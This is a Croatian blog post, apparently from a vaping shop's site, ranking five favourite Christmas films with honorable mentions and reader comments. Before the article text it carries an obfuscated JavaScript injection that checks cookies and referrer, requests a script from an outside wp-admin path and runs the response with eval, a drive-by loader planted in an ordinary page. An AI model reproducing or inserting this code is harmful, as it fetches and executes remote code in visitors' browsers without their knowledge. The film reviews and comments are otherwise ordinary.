;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
TOP 5 Božićnih filmova

Top 5 Božićnih filmova koje možemo gledati svakog Božića

Ima tih filmova koje smo svi gledali stotinu puta, ali ih uvijek možemo pogledati ponovo, a vrlo se često radi upravo o Božićnim filmova koji nam dodatno pomažu stvoriti u našim domovima prazničnu atmosferu.

Danas smo za vas odabrali top 5 najboljih božićnih filmova koje bi svatko trebao pogledati barem jednom, ako ne i svakog Božića.

Stoga pripremite kokice, ugasite svijetla, napunite tankove svojom omiljenom tekućinom za e cigarete i spremite se za TOP 5 Božićnih filmova.

It`s a wonderful life (1946.)

Na samom vrhu naše liste nalazi se trajna klasična zvijezda Franka Capre – Jimmy Stewart kao George Bailey, nesvjesni spasilac Bedford Fallsa, čovjek čija su dobrota i velikodušnost dirnuli više ljudi nego što on misli. Zapravo, dok se jedan sumorni Božić nazire, on to uopće ne shvaća i spreman je počiniti samoubojstvo – sve dok anđeo po imenu Clarence (Henry Travers) ne stigne da mu pokaže kako bi svijet izgledao da se on nikada nije rodio.

Iako je postao sinonim za blagdansko veselje, Caprin film poseban je prvenstveno zbog svoje spremnosti da ode na neka mračna mjesta i zbog Stewartove sposobnosti da u jednom trenutku glumi društvenog miljenika, a u sljedećem čovjeka čiji se svijet ruši. Zanimljivo je da je film izašao u široku prodaju tek nakon Božića u siječnju 1947., što je moglo pridonijeti njegovoj nevjerojatnoj uspješnosti na kino blagajnama. No, dobio je drugi život zahvaljujući nemilosrdnim emitiranjima na lokalnoj televiziji 70-ih i 80-ih, gdje je njegov prikaz mračne noći duše jednog čovjeka (i košmarna vizija kako izgleda neobuzdana pohlepa bez onih koji su zainteresirani za pravednost i pravdu stati na put g. Pottersima svijeta) povezana s novom generacijom.

Nije teško vidjeti zašto. Utemeljen je na detaljima vremena koje ga je nadahnulo – depresije, Drugog svjetskog rata – ali njegova vizija blagdanske ljubaznosti i vrste zemlje u kojoj bi većina nas željela živjeti i vrijednosti ljubaznosti i velikodušnosti koje većina nas dijeli, ostaje bezvremenski.

Miracle on 34th street (1947.)

Evo pitanja: Što se događalo što je dovelo do toga da je 1947. objavljeno toliko sjajnih božićnih filmova? Te je godine objavljen film Biskupova žena, Dogodilo se na Petoj aveniji, a većini gledatelja ponudila je prvu priliku da pogledaju i našeg gore navedenog favorita. Ova je godina proizvela i  ljupku priču o djevojčici (Natalie Wood) čija majka (Maureen O’Hara) nesvjesno unajmljuje nekoga tko bi mogao biti pravi Kris Kringle kao Djed Mraz u robnoj kući Macy’s. Ono što slijedi je dijelom fantazija, dijelom romansa (jer se O’Harin lik počinje zaljubljivati ​​u šarmantnog susjeda), dijelom optužnica za komercijalizam, dijelom obrana dopuštanja djeci da budu djeca dok god mogu, a dijelom pravni triler. Uglavnom, film, koji je napisao i režirao George Seaton, neodoljiv je djelić božićne ćudljivosti koji je postao nezaboravan zbog toga što je Edmund Gwenn postao čovjek koji bi zaista mogao biti Djed Mraz.

The nightmare before Christmas (1993.)

Je li ovo božićni film ili film za Noć vještica? Zašto odabrati jedan kada je očito oboje? Noćna mora prije Božića postala je tolika marketinška nagrada za Noć vještica – sa slikama protagonista Jacka Skellingtona i Sally koji postaju neizbježni svakog listopada – da je lako zaboraviti da je u srcu priča o ljubaznom duhu koji uči pravo značenje Božića. (To što njegova najpoznatija pjesma ponavlja riječi “This is Halloween!” iznova i iznova vjerojatno ne pomaže.) Režirao ga je Henry Selick prema priči i dizajnu Tima Burtona, izgrađujući razrađenu mitologiju od praznika i naseljavajući je dragim likovima s lekcijama koje treba naučiti i nevoljama koje treba prevladati.

Love Actually (2003.)

Ovaj film Richarda Curtisa iz 2003. govori nam o toliko različitih vrsta ljubavi da svatko među njima može pronaći svoju omiljenu. Ne sviđa vam se glupa priča u kojoj neki nesretni Britanci lete u Ameriku kako bi testirali teoriju da će ih njihov naglasak učiniti hitom među ženama? Samo ostanite s nama za mučnu priču o nevjeri s Alanom Rickmanom i Emmom Thompson u glavnim ulogama. Dosadne su vam priče o nevjeri? Možda vam se svidi ona u kojoj se mali dječak zaljubljuje u kolegicu iz razreda. Ili pak onaj u kojoj premijer (Hugh Grant) osvaja srce svoje asistentice. Osim toga, izvedba Billa Nighyja kao isprane rock zvijezde pravi je poklon u bilo koje doba godine.

Elf (2003.)

Ponekad je pravi glumac u pravoj ulozi gotovo sve što vam treba. U ovom ugodnom, glupom filmu glumi Will Ferrell kao Buddy, čovjek koji je odrastao na Sjevernom polu živeći pod pogrešnim dojmom da je vilenjak, unatoč tome što se razvio u nezgrapnu odraslu osobu s malo vještina za vilenjačke pothvate kao što je izrada igračaka. Na kraju se mora snaći u ljudskom svijetu kada otputuje u New York u potrazi za svojim rođenim ocem (James Caan). Kao cinična zaposlenica robne kuće, Zooey Deschanel predstavlja zabavan kontrast Ferrellovom entuzijazmu divljih očiju. Film postaje sve bolji što se manje oslanja na divlje ludorije, a Ferrell i drugi se brinu da ostane iskren.

Honorable mentions

Postoji čitavo mnoštvo vrlo dobrih Božićnih filmova i izuzetno je teško odabrati TOP 5 a da se i mi sami ne osjećamo zakinuti za neke od popularnijih naslova koje smo gledali na velikim i malim ekranima. Stoga evo nekoliko trailera iz filmova koji su dobili počasno mjesto na ovoj listi

Die Hard (1988.)

Prošlo je više od trideset godina otkako Hans Gruber prvi puta označio dolazak Božića svojim padom sa nebodera Nakatomi Plaza. Tako da ukoliko ne emitiraju jednu od verzija Die Hard-a na TV programu, zasigurno ga možete naći na nekom od streaming servisa.

Gremlins (1984.)

Apsolutno se protivimo poklanjanju kućnih ljubimaca kao dar za Božić. Živa bića nisu poklon. Udomiti kućnog ljubimca znači pomno isplanirati raspored obveza, osigurati sve potrebne uvjete, hranu, medicinsku skrb, mjesto gdje će ljubimac živjeti. Biti nespreman i neodgovoran za kućnog ljubimca može dovesti do općeg kaosa. Kao što možete vidjeti u ovom filmu.

Home Alone (1990.)

Blagdani često mogu biti i vrijeme kaosa. (Prisilna) obiteljska druženja, putovanja na zimovanje, organiziranje dočeka Nove Godine, čestitari, francuska salata sa ili bez jabuka – sve je to opći kaos. No kako bi izbjegli svoj vlastiti kaos koji puta se valja nasmijati tuđem kaosu.

Tags: ,
Choose your Reaction!
 • Kad vidim “sam u kući” sve nastavke dođe mi da vrištim i nikad više ne prestanem. Može LOTR,i može Alien. I Gremlini, volim gremline.

 • Najluđi Božić (National Lampoon’s Christmas Vacation) s Chevy Chase-om. To je već tradicija. Svaki Božić se mora gledati! 😃

  • o da, i to je jedan od klasika :) možda i najbolji iz serijala Chevy Chase-a i familije…

 • Samo Die Hard, sve djelove, opet iznova.. Kod nas balkanaca je tipicno da pratimo titlove i onda kad neki film gledamo vise puta, svaki put nesto novo vidimo tako da iznova uzivamo.. bar kod mene je tako..

 • Hobit i LOTR trilogija su neizbježni must watch za božićno vrijeme gotovo svake godine… Gremline nikad nisam volio baš previše, Die Hard obavezno, eventualno još Gooniesi, Star Wars i slični klasici :)

 • Prije nekoliko godina smo se maknuli sa “zemaljskih kanala” i sa zadovoljstvom mogu reci da “ovisimo” jedino o streaming servisima, sto je osvjezenje i predivan osjecaj izbora da se izbjegnu jedni te isti filmovi od ’84te.
  Jedan jako dobar mention bi isto tako bio “Klaus” https://g.co/kgs/6zfZ5P simpaticna i zabavna prica.

 • Jadno ono dete svake godine ostaje sam u kuci i svake godine ga napadaju isti lopovi hoce li ih neko konacno zatvoriti 😂

 • Cim spomenem bozicni film, ovom mom naraste ovo malo kosice na glavi. Aaali, posto nemam Netflix, internet signal mi je relativno nikakav, imam kanal Diva, koji za sad, od 7 ujutro do 20 navecer prikazuje samo i iskljucivo bozicne filmove. 😁😁

  Ali, prva dva klasika bi vrijedilo pogledat. Hvala kaj ste me podsjetili na njih ❤️❤️

  • Definitivno filmovi koji se svaki Božić gledaju. Ja imam netflix, ali…. Sve Božićne smo već pregledali 😂. Neke i po nekoliko puta 😂 pa sad čekamo i neka nova izdanja.

Leave a Comment